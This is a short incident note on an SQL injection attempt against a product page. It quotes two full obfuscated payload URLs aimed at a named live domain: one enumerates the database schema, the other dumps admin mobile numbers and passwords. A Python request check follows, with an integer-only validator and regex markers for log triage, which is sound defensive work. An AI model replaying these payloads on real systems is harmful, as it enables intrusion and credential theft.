SQL injection in websites with open record ID redirection
Created by: Nishant Pandey
Modified on: Tue, 3 Mar, 2020 at 12:07 PM
Hacking attempt against a conventional SQL panel.
In the first request the attacker retrieves the database schema, and in the second request they retrieve all the database key values:
https://kaushalinfra.com/product-detail.php?id=6%27%20%20and%20mod(29,9)%20and%20@a:=((SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM({%20f/*!50000informatioN_ScheMa*/.%20columns%20})WHERE(@x)IN(@x:=CONCAT(0x20,@x,table_name,%27:::%27,column_name,0x3c62723e))))x))%20unIon%20distinctrOw%20/*!50000sElect*/%201,2,@a,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
https://kaushalinfra.com//product-detail.php?id=6%27%20%20and%20mod(29,9)%20and%20@a:=((SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,mobile,%27:::%27,password,0x3c62723e))))x))%20unIon%20distinctrOw%20/*!50000sElect*/%201,2,@a,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--%20-
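A request check for the obfuscation seen in the two URLs above, added here as an example and not taken from the article or the affected site: it treats id as an integer-only parameter and, for log triage, unwraps MySQL versioned comments and lowercases the value before matching. The function names, the marker list, the shop.example host and the shortened sample requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL executes the body of /*!50000 ... */, so unwrap it before matching.
VERSIONED_COMMENT = re.compile(r"/\*!\d*(.*?)\*/", re.S)

# Markers drawn from the two requests quoted in the article.
MARKERS = {
    "schema_enumeration": re.compile(r"information_schema"),
    "union_select": re.compile(r"union\s+(?:all\s+|distinct(?:row)?\s+)?select"),
    "user_variable_assignment": re.compile(r"@\w+\s*:="),
    "trailing_comment": re.compile(r"--\s"),
}

def normalize(value):
    """Unwrap versioned comments, lowercase, and collapse whitespace."""
    value = VERSIONED_COMMENT.sub(r" \1 ", value)
    return re.sub(r"\s+", " ", value.lower())

def inspect_request(url, param="id"):
    """Report whether `param` is a plain integer and which markers it carries."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [""])
    raw = values[0]  # parse_qs has already percent-decoded the value
    text = normalize(raw)
    return {
        "valid_id": re.fullmatch(r"[0-9]{1,10}", raw) is not None,
        "markers": [name for name, rx in MARKERS.items() if rx.search(text)],
    }

# Constructed sample requests (shortened fragments, hypothetical host).
SAMPLES = [
    "https://shop.example/product-detail.php?id=6",
    "https://shop.example/product-detail.php?id=6%27%20and%20mod(29,9)"
    "%20unIon%20distinctrOw%20/*!50000sElect*/%201,2,@a--%20-",
    "https://shop.example/product-detail.php?id=6%27%20and%20@x:=0x00"
    "%20/*!50000informatioN_ScheMa*/.columns--%20-",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_request(url))
```

The integer check is the control that rejects the request; the marker list only helps classify what was attempted when reviewing access logs.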